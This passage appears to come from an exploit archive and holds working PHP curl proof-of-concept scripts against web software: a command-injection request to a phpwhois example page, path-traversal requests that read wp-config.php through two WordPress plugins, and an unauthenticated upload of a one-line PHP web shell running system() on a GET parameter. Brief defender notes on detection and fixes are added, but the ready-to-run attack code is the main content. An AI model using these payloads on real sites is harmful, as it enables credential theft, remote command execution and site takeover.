// from deployed installs is the obvious hardening step — confirm against the release.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target]/modules/nullregistrar/phpwhois/example.php?query=[CMD]");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
// Response body is echoed as-is.
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
-
WordPress Plugin Sell Download 1.0.16 - Local File Disclosure
########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright (c) 2015 | Dz Offenders Cr3w]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ########################################### # # [>] Title : Wordpress Plugin Sell Download v1.0.16 Local File Disclosure Vulnerability # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : File Disclosure # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [!] Vendor : http://wordpress.dwbooster.com/content-tools/sell-downloads # ########################################### # # [!] Description : # # Wordpress plugin Sell Download v1.0.16 is suffer from Local File Disclosure Vulnerability # remote attacker can disclosure some local files. # ####
<?php
// page : sell-downloads.php
// lines : 119, 130.. 131
// PoC: the "file" GET parameter selects the download that is served back; the
// value below uses "../" traversal plus a trailing %00 to point at wp-config.php
// outside the plugin directory.  No WordPress cookie is sent in this request.
// Defender note: a "file" value containing "../" or a %00 byte on
// sell-downloads.php is the signature to alert on.  The fix pattern is to resolve
// the requested name against the allowed download directory and reject anything
// that escapes it; the plugin's actual patch status is not stated on this page.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/sell-downloads/sell-downloads.php?file=../../../../../../../../.././wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
// Response body is echoed as-is.
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
#### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ; ####
-
WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities
########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright (c) 2015 | Dz Offenders Cr3w]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ########################################### # # [>] Title : Wordpress Plugin Advanced uploader v2.10 Multiple Vulnerabilities # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : File Upload / Code Exec / Disclosure # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [!] Vendor : http://www.wordpress.org # ########################################### # # [!] Description : # # Wordpress plugin Advanced uploader v2.10 is suffer from multiple vulnerabilities # remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files. # ####
<?php
// page : upload.php
// lines : 1030... 1037
// PoC 1 (file upload): a multipart POST of a .php file to the plugin's upload.php.
// No WordPress cookie is sent, which suggests no capability check on the
// handler — confirm against the plugin source.
// Defender note: POSTs to advanced-uploader/upload.php carrying a .php (or other
// executable) filename, and new .php files appearing in the upload location, are
// the signals; the fix pattern is a capability/nonce check plus an extension
// allow-list on the server side.
$postData = array();
$postData['file'] = "@k3d.php"; /* k3d.php : <?php system($_GET["dz"]); ?> */
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http:/[target].com/wp-content/plugins/advanced-uploader/upload.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
// Response body is echoed as-is.
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
##################
<?php
// page : upload.php
// lines : 1219... 1237
// PoC 2 (file disclosure): the "destinations" GET parameter is used with "../"
// traversal and a trailing %00 to point at wp-config.php.
// Defender note: a "destinations" value containing "../" or %00 on upload.php is
// the signature; resolving the value against the intended base directory and
// rejecting escapes is the fix pattern.  Patch status is not stated on this page.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$[target].com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
// Response body is echoed as-is.
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
#### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ; ####